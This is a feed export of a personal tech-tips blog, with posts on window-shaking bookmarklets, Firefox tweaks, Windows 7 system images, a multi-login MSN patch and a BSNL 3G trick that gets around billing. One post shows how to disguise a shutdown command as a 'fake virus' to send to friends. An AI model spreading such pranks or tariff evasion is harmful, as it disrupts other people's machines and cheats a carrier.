tag:blogger.com,1999:blog-26327008943178611332024-03-05T14:51:29.003-07:00Satyam 4brotherSatyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comBlogger90125tag:blogger.com,1999:blog-2632700894317861133.post-21405788314186923872012-01-28T04:22:00.000-08:002012-01-28T04:22:15.812-08:00Check out these funny trick.Copy and paste the java script code to the address bar of your browser<br />
<br />
"javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)"<br />
<br />
OR<br />
<br />
"javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0)"<br />
<br />
2: Press enter and watch your window's "shaking it". You can change the value of i if you wish :-)Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-82965208971498418122012-01-28T04:17:00.002-08:002012-01-28T04:17:17.794-08:00BSNL 3G Hack trick to Unlimited Browsing at normal GPRS rate.<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6G1rZ8XvXSFipxVuTenc3MvbG2ejle5kf0IFwb9V-fmjpGQQMnHLfh856-Uhutr6TqmajzuJgMMJiXoe2QOP5236ZzCfoLdIqQ3DOIbpfuvRkGNN0UjmDrZcrVOp0xyXd_oN4FoRM7cYl/s1600/20phone6.jpg" imageanchor="1" style="clear:right; float:right; margin-left:1em; margin-bottom:1em"><img border="0" height="200" width="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6G1rZ8XvXSFipxVuTenc3MvbG2ejle5kf0IFwb9V-fmjpGQQMnHLfh856-Uhutr6TqmajzuJgMMJiXoe2QOP5236ZzCfoLdIqQ3DOIbpfuvRkGNN0UjmDrZcrVOp0xyXd_oN4FoRM7cYl/s200/20phone6.jpg" /></a></div><br />
Here is a 100 % working trick to unlimited use BSNL 3G at the cost of<br />
Normal GPRS<br />
<br />
First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.<br />
now activate gprs by sending sms GPRS PRE to 53733 It will be<br />
activated in 24 hours, after activation get gprs settings by calling customer care<br />
<br />
Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)<br />
in it, After activation You have to chnage only one thing in yor 3G enabled cell.<br />
<br />
Go to settings>tools>settings>phone&g<br />
t;network>network mode> now select UMTS<br />
<br />
THEN do manual searching for network u will fing bsnl 3g network there wid small 3g logo along wid its name, select it as default<br />
<br />
Now see your data singnals logo, it is converted into 3G<br />
You will get near about 500kbps to 1200 kbps speed<br />
Remember use BSNLEGPRS or BSNLPREPAID as your access point.Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-81115670121241951532012-01-12T21:12:00.000-08:002012-01-12T21:12:30.962-08:00Satyam Gupta, Bangarmau<a href="http://satyambangarmau.blogspot.com/#.Tw-9OzDFavg.blogger">Satyam Gupta, Bangarmau</a>Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-91217232778841123422012-01-12T21:11:00.000-08:002012-01-12T21:11:29.361-08:00Satyam Study Point & Books Library<a href="http://ebookstudypoint.blogspot.com/#.Tw-8_cv34Ek.blogger">Satyam Study Point & Books Library</a>Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-90337597162356658902012-01-12T21:10:00.000-08:002012-01-12T21:10:32.498-08:00Satyam Songs<a href="http://satyamsongs.blogspot.com/#.Tw-8xA9848E.blogger">Satyam Songs</a>Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-14625505773190729292012-01-12T09:12:00.000-08:002012-01-12T09:12:04.172-08:00Make your Mozilla Firefox fasterThere is an easy way to make your Firefox load webpages faster. It is done be enlarging the limit of the requests that firefox can send to a page. This is also called tunneling or pipelining.<br />
<br />
Every time before a page is loaded, Firefox must send a request to that page. So if you make a bigger number of request, you’ll get a better respond time. Now we ask ourselves, why don’t the makers of webbrowsers set the number of maximum request very high. The reason is that the servers of the pages we would like to visit would overload if everyone of us sent a thousand requests. So by the default, Firefox is sending 4 request.<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBHXgYGNAvBIpxF1RqN1Fi4dhJUpHz6ahZxwjph2bosBjNeIa-DBemXVKkVlvAU219Jmdqg4hPB3p-BPRzmJXiq78Uri5937SJqKObfdtra_BX8ROtUuu5SUtPcFPlrcByELp3xpbtqPNR/s1600/Mozilla+Firefox-wallpapers.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="160" width="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBHXgYGNAvBIpxF1RqN1Fi4dhJUpHz6ahZxwjph2bosBjNeIa-DBemXVKkVlvAU219Jmdqg4hPB3p-BPRzmJXiq78Uri5937SJqKObfdtra_BX8ROtUuu5SUtPcFPlrcByELp3xpbtqPNR/s200/Mozilla+Firefox-wallpapers.jpg" /></a></div><br />
<b>1.</b>Open a new tab and type in <i>about:config</i> in the address bar.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWX5G3fq9wFVjGi6SZjQk2XhreTQlMsZ4jCW5aVVzJaniX2QT7uymppAVts6Zp0Ppuei40ihqJLCowdFSidD9mZXLGpGIcHiNMCkLLoWPKJTVkaEHgRWC6-4PbPEfhQv5rQqF6RvNnGmkv/s1600/12.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="200" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWX5G3fq9wFVjGi6SZjQk2XhreTQlMsZ4jCW5aVVzJaniX2QT7uymppAVts6Zp0Ppuei40ihqJLCowdFSidD9mZXLGpGIcHiNMCkLLoWPKJTVkaEHgRWC6-4PbPEfhQv5rQqF6RvNnGmkv/s320/12.JPG" /></a></div><b><br />
2.</b>Now in the search bar type in <i>network.http</i> . a list like this will appear.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOyGQgZf42C4BVINtKS7JRx9AnFQqTebnoFe9Xna7MFOyfUgm3ci507SGJ7yeCbPW4_xz-jFfzua1wTPWFi31hID5Gj15aWB7rAhIqI6I-Dyozt2KcLKfiqsATIqEgf5-16FRAHdI8WilH/s1600/118.gif" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="320" width="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOyGQgZf42C4BVINtKS7JRx9AnFQqTebnoFe9Xna7MFOyfUgm3ci507SGJ7yeCbPW4_xz-jFfzua1wTPWFi31hID5Gj15aWB7rAhIqI6I-Dyozt2KcLKfiqsATIqEgf5-16FRAHdI8WilH/s320/118.gif" /></a></div><br />
<b>3</b>.These three bolded rows are the ones we’re interested in.<br />
<br />
The first bold row is <i>network.http.pipelining</i>. By the default its value is set to false. Double-click on it and it will change to true.<br />
<br />
The second bold row is network.http.pipelining.maxrequests. The value by the default is four. You change it to a desired value. My value is 50 and I personally believe that 50 requests is just enough to make it faster, but still small enough to pass unnoticed to almost all websites.<br />
<br />
The third bold is <i>network.http.proxy.pipelining.</i> Just double-click it so that the value is true.<br />
<br />
If you experience any difficulties with firefox afterwards, just undo the new values.<br />
<br />
Here’s a video instructional if you find it easier to follow the steps this way:<br />
<br />
<iframe width="459" height="344" src="http://www.youtube.com/embed/kZ9Ic30QMrk?fs=1" frameborder="0" allowFullScreen=""></iframe>Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-25802242937286077032012-01-12T07:19:00.000-08:002012-01-12T07:19:09.016-08:00How to Create A System Image in Windows 7.There are quite a few backup options available in Windows 7 and one of them is creating a system image. You do not need to make use of a third party application such as Ghost or True Image to do it. You can do it simply by making use of a feature available on Windows 7.<br />
<br />
After installing Windows 7 and all your favorite software on your system, you need to create a system image of your machine. The image disc you create will come handy in case your pc crashes and it will help you to restore your system to the current state. What is a system image? It is an exact copy of the things you have stored on your drive. The best time to perform a system image is when you feel the system is working in perfect condition.<br />
<br />
Here is how you can create a system image in Windows 7:<br />
<br />
<b>1.</b> Click on the Windows logo on the bottom left of the screen and click on <b>Getting Started</b> and then click on <b>Back up your files</b>. Alternatively, you can type <b>Backup and Restore</b> in the search field present on the Start Menu.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNX4nfkYrAH3AIX2JXwYcV_foWF33rZQw7a58g8zp70Fdw7oIoYs6FYNoW0CgUb8odYHweULLvHSUl49vmFi6fmZ_KfSPtRvSs537B0A4Pv_y3wuxobEEsxljPgtXSKjshjgJTpdqPiehJ/s1600/3.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="388" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNX4nfkYrAH3AIX2JXwYcV_foWF33rZQw7a58g8zp70Fdw7oIoYs6FYNoW0CgUb8odYHweULLvHSUl49vmFi6fmZ_KfSPtRvSs537B0A4Pv_y3wuxobEEsxljPgtXSKjshjgJTpdqPiehJ/s400/3.JPG" /></a></div><br />
<b>2.</b> On the new Window that opened, you need to click on <b>Create a system image</b>. Doing this will open a new window with the title Create a system image.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimL3f_Co3NIUhN6i0aBnRi53yrU1q7UN5qappP35Ghj45eArHeDvbw38PuVXyB9MGSvcrGjtb_svfPGKLDA2JQuldIq3e1RhmP70SYE4XIzToLoto1X3Ub1-T4sBVKnWWfjbJsgODbIYpS/s1600/4.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="188" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimL3f_Co3NIUhN6i0aBnRi53yrU1q7UN5qappP35Ghj45eArHeDvbw38PuVXyB9MGSvcrGjtb_svfPGKLDA2JQuldIq3e1RhmP70SYE4XIzToLoto1X3Ub1-T4sBVKnWWfjbJsgODbIYpS/s400/4.JPG" /></a></div><br />
<b>3.</b> You need to select where you want to save the system image file. You can save the image on to your hard drive, or on external hard disk drive or on multiple DVD’s through burning and you can even store it on a network location. Once you have selected the appropriate option, click Next.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7gHNKKc9aNWO3nxCDaRiX_ez8he0OCA91EtC5XP3rEgEbA_EBcg3zZUYZkWZ4U49zOEon3GR_V_LajHQoUDDbbWHz6rD2gWx3CjhhZoKABZpm0QdZAhZTn9FQSnsytiPsCbd4vRWf3m7K/s1600/5.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="308" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7gHNKKc9aNWO3nxCDaRiX_ez8he0OCA91EtC5XP3rEgEbA_EBcg3zZUYZkWZ4U49zOEon3GR_V_LajHQoUDDbbWHz6rD2gWx3CjhhZoKABZpm0QdZAhZTn9FQSnsytiPsCbd4vRWf3m7K/s400/5.JPG" /></a></div><br />
<b>4.</b> On the <i>Which drives do you want to include in the backup</i> screen, you need to select the drives you want to backup and then click on Next. Please note that on the same screen, you will also be shown how much space the backup would take.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsxNVPFwosHonuE8f6uDJujpf8YOXNvjtEgsQzvcM2nKEiHnRzIAs68Y3ACCvsFk8N62Hl37tCT8bmxzfZwOC3SHHkRB9v5RXeJieCrznR_BcLLDqAdhsUx8RMPEzREKuIAAz0paQQUqns/s1600/6.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="249" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsxNVPFwosHonuE8f6uDJujpf8YOXNvjtEgsQzvcM2nKEiHnRzIAs68Y3ACCvsFk8N62Hl37tCT8bmxzfZwOC3SHHkRB9v5RXeJieCrznR_BcLLDqAdhsUx8RMPEzREKuIAAz0paQQUqns/s400/6.JPG" /></a></div><br />
<b>5.</b> The next screen is <i>Confirm your backup settings</i>. Here you will be shown all the drives that will be backed up. Once confirmed, click on Start backup<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYEBiKdwvhT-TSIb3SYBSB98xsJ3g83KmiHYvn0wl3SYINkuIARixtQHq0diYGIKI4F4ZnXTSVnqWNDsL-uCnDZCE_bEdOKXhJZB4ZFynlxqgxIHgj7bfM1gFov177skBqlWkm7x8ackE9/s1600/7.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="340" width="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYEBiKdwvhT-TSIb3SYBSB98xsJ3g83KmiHYvn0wl3SYINkuIARixtQHq0diYGIKI4F4ZnXTSVnqWNDsL-uCnDZCE_bEdOKXhJZB4ZFynlxqgxIHgj7bfM1gFov177skBqlWkm7x8ackE9/s400/7.JPG" /></a></div><br />
<b>6.</b> You will now see a progress meter that will show the progress of the images that are being created. The speed of the backup varies from system to system depending upon its configuration.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBgqHdm5_xbGh2zCYHc2_-dp2SCSFzZexoi_LDLMv0bsjWHcwC6_UneMjBq0la4fNInjLDZLGuHibr-bMg7-Cb74fg8DpLBzYgNX85NOIAx-XydHuHP1unvGDKZIeRhts6hp0bLt6KL7-8/s1600/8.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="223" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBgqHdm5_xbGh2zCYHc2_-dp2SCSFzZexoi_LDLMv0bsjWHcwC6_UneMjBq0la4fNInjLDZLGuHibr-bMg7-Cb74fg8DpLBzYgNX85NOIAx-XydHuHP1unvGDKZIeRhts6hp0bLt6KL7-8/s400/8.JPG" /></a></div><br />
<b>7.</b> Once the process finishes, you will be asked Do you want to create a system repair disc? And it will also tell you what a system repair disc is. You can confirm by pressing Yes and save the system repair disc in a secure location and it will lead you on to the next screen.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjevkgCv3MfNpipo6NQVOSR4gRRTEv_JncFHBw8D7lTVi3mf-stHvcpIxNFegB8gxclQuEgseQGAOfgqv5O1eyaRpxUKp9aHIfgg-fsuTYQ_i5PvRerqn6eK_1yZha6H4ezPOwbVblAC-c_/s1600/9.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="218" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjevkgCv3MfNpipo6NQVOSR4gRRTEv_JncFHBw8D7lTVi3mf-stHvcpIxNFegB8gxclQuEgseQGAOfgqv5O1eyaRpxUKp9aHIfgg-fsuTYQ_i5PvRerqn6eK_1yZha6H4ezPOwbVblAC-c_/s400/9.JPG" /></a></div><b><br />
8.</b> On this screen, you will be prompted to enter a black CD or DVD to store your system repair image. Once you pop in the disc, you can click on Create Disc.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA6RmHe-_ZG0MuNSuwvIjqcmQy-717VxCElFz8QutmabxQ1zHRwb5FHl5of8WpfNz9SBVCgplmIITNm_pnpCVd76zsLmNzWmS5fkxeFILQRehr_NIE9QpoXwqf3oJSw0aDOxogBU3MJQlF/s1600/10.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="260" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA6RmHe-_ZG0MuNSuwvIjqcmQy-717VxCElFz8QutmabxQ1zHRwb5FHl5of8WpfNz9SBVCgplmIITNm_pnpCVd76zsLmNzWmS5fkxeFILQRehr_NIE9QpoXwqf3oJSw0aDOxogBU3MJQlF/s400/10.JPG" /></a></div><br />
When you want to restore the backed up system image and system repair disc, you can go to the System Recovery Options and choose the appropriate option.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNvTSiYjcM6johyphenhyphentBwqyQXnkVxpY1hiPmOjIPBVUemR4bNuke0uHH5U0RjgnBOPKXVIT6Kmzlc7P3Qgekpt_J0u_hIhxDzHCkotY9rzOJLHuFzJJCsMNzEr-NbjHWI5cb6k32bZSYBuExI/s1600/11.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="305" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNvTSiYjcM6johyphenhyphentBwqyQXnkVxpY1hiPmOjIPBVUemR4bNuke0uHH5U0RjgnBOPKXVIT6Kmzlc7P3Qgekpt_J0u_hIhxDzHCkotY9rzOJLHuFzJJCsMNzEr-NbjHWI5cb6k32bZSYBuExI/s400/11.JPG" /></a></div>Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-33967184203335820252012-01-12T06:59:00.000-08:002012-01-12T06:59:19.534-08:00Multiple Windows Live Messengers (MSN) at once.All of you surely must be a IM addict. Let’s say you’re using more than one account and you want to have the option of using them all at the same time. WLM only allows one session at once, i.e. only one ID logged in at the same time. To bypass this restriction there are many programs on the web, but my personal choice is MSN Messenger (WLM) Polygamy 2009. This program works for all WLM version published so far.<br />
<br />
1.Just download it from this link.<br />
<br />
2.Before you run the patch, exit MSN.<br />
<br />
3.Run the patch.<br />
<br />
4.Choose the allow multiple log-in option<br />
<br />
5.Now open MSN twice and enjoy using different ID-s at the same time<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiIq7pL4xlJ1IN5QJIyJmi_07asqV4KC22sBSj7o7t-NvBH6pqyWPbdiXRSQSmYMm2SBGHVQLRhyAVpZBvkqQ9AxWzXNWNbYQQboMaoHJoH_LjfRPVRexTOSbF_i04_2bqAC5W2NBta-O_/s1600/msn_messenger_7___8_polygamy-56562.gif" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="305" width="355" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiIq7pL4xlJ1IN5QJIyJmi_07asqV4KC22sBSj7o7t-NvBH6pqyWPbdiXRSQSmYMm2SBGHVQLRhyAVpZBvkqQ9AxWzXNWNbYQQboMaoHJoH_LjfRPVRexTOSbF_i04_2bqAC5W2NBta-O_/s400/msn_messenger_7___8_polygamy-56562.gif" /></a></div>Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-17454570488079573262012-01-12T06:54:00.001-08:002012-01-12T06:55:14.029-08:00How To Make A Fake Virus In Comuter<div dir="ltr" style="text-align: left;" trbidi="on">This is an interesting tutorial in which we will create a fake “virus” which can shutdown, restart and log off your pc(Can also write a message and specify the <span class="IL_AD" id="IL_AD4">countdown</span> time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking START>TURNOFF button etc….And you can always do a little mischief by sending it to your friends ;)<br />
<span id="more-3116"></span><br />
1Create shortcut,(Right click on your desktop and go to new -> shortcut )<br />
2)After this will appear window and that is where you type the code<br />
<br />
<strong><code>shutdown -s -t 300 -c "Your Message"</code></strong><br />
<br />
There are few <span class="IL_AD" id="IL_AD11">variants</span> , this one will shutdown pc .<br />
To log of computer type <strong><code>shutdown -l -t 300 -c "your message"</code> </strong><br />
To restart computer type <strong><code>shutdown -r -t 300 -c " your message"</code> </strong><br />
The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.<br />
<br />
3) Click Next, Finish<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDFELlwqgJqkFw6v9G0x0LM07d-88V8EkRZMamkyPaSm5HY9ZIzCVWaI9ovErmpAcQ98iWSEHVuYw3B5yDMBdqwvPL1N-AxZYJMAdXRjbSRcmvdDG_QujhJwWkFlljhPDNC_8toUSbBPaa/s1600/1.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="295" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDFELlwqgJqkFw6v9G0x0LM07d-88V8EkRZMamkyPaSm5HY9ZIzCVWaI9ovErmpAcQ98iWSEHVuYw3B5yDMBdqwvPL1N-AxZYJMAdXRjbSRcmvdDG_QujhJwWkFlljhPDNC_8toUSbBPaa/s400/1.JPG" /></a></div><br />
<br />
<br />
4) After this will appear icon on desktop, when someone click it, shutdown box will pops up. <br />
<br />
<b>How can I stop system shutdown ? Go to Start->Run , then open cmd,write shutdown -a and press ENTER on keyboard, as shown below</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQCQt54CnzcuaO3z-j2f6DYUG6TlfcoN1kW9S-t4nBo5XMTqc-PWs-RN_t9pMXjyHFCIT0HinP6aOcoqxSbw0Y_kpwUG1N21OVaNb89eY-NfJvWHCtMGdYg_KzbMaa3M-akZih3_d7FlkW/s1600/2.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="264" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQCQt54CnzcuaO3z-j2f6DYUG6TlfcoN1kW9S-t4nBo5XMTqc-PWs-RN_t9pMXjyHFCIT0HinP6aOcoqxSbw0Y_kpwUG1N21OVaNb89eY-NfJvWHCtMGdYg_KzbMaa3M-akZih3_d7FlkW/s400/2.JPG" /></a></div><br />
<b>Here’s a video instructional if you find it easier to follow the steps this way.</b><br />
<br />
<iframe width="459" height="344" src="http://www.youtube.com/embed/JbNf0QMT3Eg?fs=1" frameborder="0" allowFullScreen=""></iframe><br />
</div>Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-35549230714254887222011-07-28T03:52:00.004-07:002011-07-28T03:55:56.195-07:00Image Hosting & Photo Sharing, Gallery Hosted<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg26SBgwzOdAdnFyPNcszqQsrb2JYSn2ur9F1wTibNuOHomPBeTqE3OisTiuT4OAznB-Bh0JmWfbWg0P1RKHJMZtRqgyDq-N9NV0m5aosxynLkyqPgA_8rV9tV1XdiRcrfmnAluuZopZymp/s1600/1q2.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 277px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg26SBgwzOdAdnFyPNcszqQsrb2JYSn2ur9F1wTibNuOHomPBeTqE3OisTiuT4OAznB-Bh0JmWfbWg0P1RKHJMZtRqgyDq-N9NV0m5aosxynLkyqPgA_8rV9tV1XdiRcrfmnAluuZopZymp/s320/1q2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5634354757098722002" /></a><br />GalleryHosted is a new website with powerful image sharing and hosting features. When I saw this website first, I liked it. Really I got impressed with mind blowing features. Basically GalleryHosted is an image hosting service and it is free, means you do not need to pay for it, and you can upload unlimited photos. It is not just a image hosting site but also you can share images on this website because it has a gallery feature that is very impressive.<br /><div><br /></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 22px; "><p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "><strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; ">Features:</strong> <em style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><a title="Online" href="http://techshali.com/tag/online/" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; text-decoration: underline; color: rgb(35, 97, 161); ">Online</a> gallery:</strong></em> It has an online gallery with thumbnail preview while viewing gallery. Gallery has smart navigation for previous and next picture and the gallery is auto sizable to fit your screen. If you do not want to see a picture after seeing its preview you can skip easily. You can set thumbnail size 20 pixel to 300 pixel. You can upload JPG, GIF and PNG images. In more you can host ***** content too.</p><p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; ">You can view grid view of a gallery.</p><p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; ">Browse gallery without reloading.</p><p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; ">You can see full page slide show like theater effect aka lights off.</p></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 22px; "><p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "><strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><em style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; ">Sharing Features:</em></strong><br />You can share you gallery link with others, if you will not share it it will be only with you. Sharing feature for individual image or full gallery.<br /><a href="http://techshali.com/wp-content/bhandar/2010/12/sharing_galleryhosted.jpg" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; text-decoration: underline; color: rgb(35, 97, 161); "><img title="sharing_galleryhosted" src="http://techshali.com/wp-content/bhandar/2010/12/sharing_galleryhosted_thumb.jpg" border="0" alt="sharing_galleryhosted" width="317" height="269" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: auto; margin-bottom: 0px; margin-left: auto; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; display: block; float: none; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; " /></a></p><p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "><em style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; ">Bulk Upload <a title="pictures" href="http://techshali.com/tag/pictures/" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; text-decoration: underline; color: rgb(35, 97, 161); ">pictures</a>:</strong></em><br />You can upload pictures in bulk, 300 picture at a time maximum. Each file should not be more than 10 MB</p><p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "><em style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; ">URL upload:</strong></em><br />This feature is also very nice, you can upload picture in bulk via URL.</p><p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "><a href="http://techshali.com/wp-content/bhandar/2010/12/galleryhosted_url_upload.jpg" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; text-decoration: underline; color: rgb(35, 97, 161); "><img title="galleryhosted_url_upload" src="http://techshali.com/wp-content/bhandar/2010/12/galleryhosted_url_upload_thumb.jpg" border="0" alt="galleryhosted_url_upload" width="531" height="373" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; 